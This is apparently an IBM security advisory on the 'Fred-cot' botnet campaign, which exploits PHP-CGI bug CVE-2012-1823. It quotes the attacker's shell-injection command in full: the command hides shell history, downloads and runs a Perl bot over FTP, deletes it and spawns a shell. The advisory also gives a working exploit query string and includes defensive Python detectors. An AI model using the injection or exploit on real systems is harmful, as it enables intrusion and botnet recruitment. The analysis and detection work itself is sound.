As a new addition to our site we will begin to more regularly feature threat analysis from IBM’s Managed Security Services organization.  This team operates a 24/7 Security Operations Center (SOC) on behalf of thousands of clients globally. 

“Fred-Cot” overview

On Saturday, November 2, the IBM SOC detected an active attack attempting to infect several webservers to become part of a botnet.  IBM has identified this attack with the name “Fred-cot.”  “Fred-cot” was part of the FTP URL where the malware repository was located as well as part of the user name / password required to access the site.  The attack, which was active over the weekend but began to taper off earlier this week, is attempting to exploit an older vulnerability in PHP.   It works by attempting to connect to port 80 (web) on a targeted IP and injecting a shell command, which if successful, allows the malware to infect the victim’s system.

Details of the attack

The original attack appeared to originate from the IP address  This attack was first spotted by our threat analysts at 7am Eastern on Saturday, November 2nd. IBM is identifying this attack as “Fred-cot.” This address appears to be crawling IP address ranges, attempting to connect to port 80 (web) on each targeted IP. Once a connection has been made, the attacking system attempts to inject a shell command. If this command runs successfully on the victim’s system, the malware connects to  via FTP to download gj.exe. Once gj.exe has been downloaded and executed, the victim’s system connects to an IRC channel and waits for further commands.

Site names,,, and all resolve to the address. Activity to and from these site names should be considered suspicious at this time. Site names,,,, and six other hosts resolve to Any activity to or from these sites should be considered especially suspicious. This IP is the repository for the malicious code.

We have seen the following shell injection code being used in this attack:

unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;wget ftp[COLON]//fredcot[COLON]fredcot123[AT];perl gj.exe;rm -rf gj.exe;w; id; /bin/sh -i';x0a$daemo

The command first switches off shell history for the session (unset HISTFILE; unset HISTSIZE) so that nothing is written to .bash_history, fingerprints the host (uname -a), fetches gj.exe into /tmp over FTP using the embedded fredcot / fredcot123 credentials, runs it with perl, deletes the file to remove the evidence, then prints the logged-in users and the current identity (w; id) and drops into an interactive shell (/bin/sh -i).

 appears to be the IP address of the IRC server the malware payload is using as a command and control (C&C) server.

We strongly recommend applying firewall rules to block any access to or from the,, and addresses. Security teams should be aware that IP addresses specified could potentially change. Some anti-virus vendors can detect this malware and it is advisable to verify your software and definition files are up to date.

Malware analysis

This attack appears to target an old vulnerability, CVE-2012-1823, in PHP when it runs as a CGI binary (php-cgi) behind an Apache web server. Fixes shipped in PHP 5.4.3 and 5.3.13 last year, and we covered the issue in a number of assessments in May and June. The bug stems from an obscure part of the CGI specification (RFC 3875, section 4.4): when the query string of a request contains no unencoded "=", the web server splits it on "+", percent-decodes the pieces and passes them to the CGI program as command-line arguments. php-cgi treated those arguments as its own options, so a query such as ?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input causes the interpreter to execute the POST body as PHP code, and ?-s makes it dump the script's source. Apache's CGI handling follows this part of the specification; other web servers generally do not, which is why the attack is aimed at PHP paired with Apache. Installations that run PHP as an Apache module (mod_php) rather than as a CGI binary are not exposed to this particular bug.
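The following Python is an added example, not IBM's code and not the attacker's script. It reproduces the RFC 3875 rule that CVE-2012-1823 abuses, flags exploit attempts in Apache access-log lines (the request line is enough, because the malicious options sit in the query string), and matches the shell-injection markers quoted above in a captured POST body. The log lines, the POST body and the 192.0.2.x / 198.51.100.x addresses are constructed for the example (RFC 5737 documentation ranges); only the fredcot / fredcot123 credentials and the gj.exe file name come from the write-up.

```python
"""Added example (not IBM's code): reproduce the CGI argument rule that
CVE-2012-1823 abuses, flag exploit attempts in Apache access-log lines,
and match the Fred-cot shell-injection markers in a request body.

RFC 3875 section 4.4: if the query string contains no unencoded '=', the
server splits it on '+', percent-decodes each piece and passes the pieces
to the CGI program as command-line arguments. php-cgi before 5.3.13 /
5.4.3 then parsed those as its own options.
"""
import re
from urllib.parse import unquote


def cgi_argv_from_query(query):
    """Return the argv a CGI server derives from a raw query string
    (RFC 3875 4.4), or [] for an ordinary form query containing '='.
    The '=' test runs on the raw string: an encoded %3d does not count."""
    if "=" in query:
        return []
    return [unquote(piece) for piece in query.split("+") if piece]


def is_php_cgi_injection(query):
    """True when the derived argv would be read by php-cgi as options
    (-s dumps source, -d overrides any php.ini directive)."""
    return any(arg.startswith("-") for arg in cgi_argv_from_query(query))


# Apache combined log format, matched up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (client_ip, path, argv) for each request whose query string
    would have been handed to php-cgi as options."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if is_php_cgi_injection(query):
            hits.append((m.group("ip"), path, cgi_argv_from_query(query)))
    return hits


# Strings from the injected command quoted in the write-up. With
# auto_prepend_file=php://input the POST body is executed as PHP, so these
# appear in the body (captured by a WAF or full packet capture), not in
# the access log.
SHELL_MARKERS = (
    "unset HISTFILE", "unset HISTSIZE", "wget ftp://",
    "perl gj.exe", "rm -rf gj.exe", "/bin/sh -i",
)


def fredcot_markers(text):
    """Return the markers present in a request body or command string."""
    return [marker for marker in SHELL_MARKERS if marker in text]


# Constructed sample data (not real attack records). Client addresses and
# the FTP host are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Nov/2013:07:01:12 -0500] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Nov/2013:07:01:13 -0500] "GET /index.php?-s HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Nov/2013:07:02:00 -0500] "GET /index.php?page=home HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [02/Nov/2013:07:02:30 -0500] "GET /cgi-bin/finger?alice+bob HTTP/1.1" 200 300 "-" "curl/7.30"',
]
SAMPLE_BODY = (
    '<?php system("unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;'
    'wget ftp://fredcot:fredcot123@192.0.2.20/gj.exe;perl gj.exe;'
    'rm -rf gj.exe;w; id; /bin/sh -i"); ?>'
)

if __name__ == "__main__":
    for ip, path, argv in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path} php-cgi argv={argv}")
    print("body markers:", fredcot_markers(SAMPLE_BODY))
```

The last sample line shows why a detector cannot simply flag every query string without "=": /cgi-bin/finger?alice+bob is the legitimate "indexed query" form the CGI specification was written for. What distinguishes the exploit is that the resulting arguments begin with "-", which php-cgi reads as options.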

The payload of the attack, gj.exe, is not a Microsoft executable despite what its name implies; it is a Perl script. There were four variations of the script on the compromised site located at  that differed slightly in the IRC server, the ports used, the IRC admins and the channels. There were also a number of files containing IP addresses, although their exact use is not known. Other tools located in the directory structure may have been used to generate the list of targets, or possibly in another form of attack.

Once infected and executing the malware, the victim’s system becomes just another bot in the botnet. Based on the code, the malware attempts to avoid detection by hiding itself as just another /usr/sbin/sshd process on the system (a Perl script normally does this by assigning to $0, which changes the name that ps displays but not the interpreter binary that is actually running). Connecting back to an IRC server, the victim waits for commands sent to it through a private message. These commands include:

  • tcpflood: sends packets to a specific host / port combination for a specified time to generate a denial of service condition
  • udpflood: sends packets to a specific host with a designated packet size for a specified time to generate a denial of service condition
  • httpflood: retrieves the index page of a specific host repeatedly for a specified time to generate a denial of service condition
  • portscan: scans a specified list of ports, including 21, 22, 25 and 80, as well as others
  • google: searches Google for references to sites with modules.php installed, possibly used to find additional vulnerable sites

Also included in the code are a number of routines specific to IRC, such as connecting to a server, registering with a random nick (vn#### was the pattern used), joining channels and exiting the IRC server. A further subroutine in the malware appears intended to allow the attacker to execute a remote command on the infected system.
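The following Python is an added example, not part of IBM's analysis, for hunting the process masquerade described above. It assumes the bot disguises itself the way a Perl script ordinarily does, by assigning to $0: that rewrites /proc/<pid>/cmdline, which is what ps and top display, but /proc/<pid>/exe still links to the interpreter and /proc/<pid>/comm still reads "perl". The SAMPLE process table is constructed; on a Linux host the script reads the live table from /proc instead.

```python
"""Added example (not from IBM's analysis): find processes whose command
line claims to be /usr/sbin/sshd (or any other daemon) while the running
binary is actually a script interpreter.

Assumption: the bot disguises itself as a Perl script normally would,
by assigning to $0. That rewrites /proc/<pid>/cmdline but leaves
/proc/<pid>/exe pointing at the interpreter and /proc/<pid>/comm set to
the interpreter's name.
"""
import os
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    cmdline: str  # /proc/<pid>/cmdline with NULs turned into spaces
    exe: str      # target of the /proc/<pid>/exe symlink
    comm: str     # /proc/<pid>/comm, the kernel's 15-char task name


# Interpreter basenames a fake daemon name would hide. Exact matches only:
# a prefix test on "sh" would also match the real sshd.
INTERPRETERS = {"perl", "python", "python2", "python3", "ruby", "sh", "bash", "dash"}


def is_masquerading(p):
    """True when argv[0] names something other than the interpreter that is
    really executing. A legitimate `perl script.pl` keeps argv[0] == "perl"
    and is not flagged; sshd's own "sshd: user [priv]" children are not
    flagged because their exe is sshd, not an interpreter."""
    tokens = p.cmdline.split()
    if not tokens:
        return False                      # kernel thread, nothing to compare
    claimed = os.path.basename(tokens[0]).rstrip(":")
    real = os.path.basename(p.exe.replace(" (deleted)", ""))
    return real in INTERPRETERS and claimed not in (real, p.comm)


def find_masqueraders(procs):
    return [p for p in procs if is_masquerading(p)]


def snapshot_procs():
    """Read the live process table from /proc (Linux only; resolving another
    user's exe link needs root)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue                      # process exited, or no permission
        procs.append(Proc(pid, cmdline, exe, comm))
    return procs


# Constructed process table for the example; pid 3042 is what the bot would
# look like after `$0 = "/usr/sbin/sshd"`.
SAMPLE = [
    Proc(812, "/usr/sbin/sshd -D", "/usr/sbin/sshd", "sshd"),
    Proc(2201, "sshd: alice [priv]", "/usr/sbin/sshd", "sshd"),
    Proc(3042, "/usr/sbin/sshd", "/usr/bin/perl", "perl"),
    Proc(3050, "perl /usr/local/bin/report.pl", "/usr/bin/perl", "perl"),
    Proc(3060, "/usr/bin/python3 /opt/app/worker.py", "/usr/bin/python3", "python3"),
]

if __name__ == "__main__":
    procs = snapshot_procs() if os.path.isdir("/proc") else SAMPLE
    for p in find_masqueraders(procs):
        print(f"pid {p.pid}: cmdline claims {p.cmdline!r} but exe is {p.exe}")
```

Two caveats for live use: a process can also change comm via prctl(PR_SET_NAME), so the exe link is the more reliable of the two signals, and a bot that deletes its script after starting (as the injected rm -rf gj.exe does) still shows the interpreter in exe, which is why the "(deleted)" suffix is stripped rather than treated as an error.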

Take action

We strongly suggest that our readers take the time to verify their PHP installations are current and are patched against this old vulnerability. This attack seems to indicate there may be systems facing the Internet that are not. As mentioned before, some anti-virus products do detect this malware. Users should ensure their anti-virus software and associated definition files are up to date. It is also advisable to block traffic to and from the hosts listed below at the perimeter firewalls. Please note, these are the IP addresses we have detected in this wave of attacks and could potentially change in the future.  Administrators should monitor their logs for any suspicious activity.

Current list of hosts that should be blocked due to malicious activity:

  • IPv4: – Original attack vector
  • IPv4: – Reverse shell destination
  • IPv4: – FTP malware repository
  • IPv4: – IRC server used for CnC
  • IPv4: – IRC server used for CnC
  • IPv4: – Additional attack vector
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
  • URI: – IRC server used for CnC
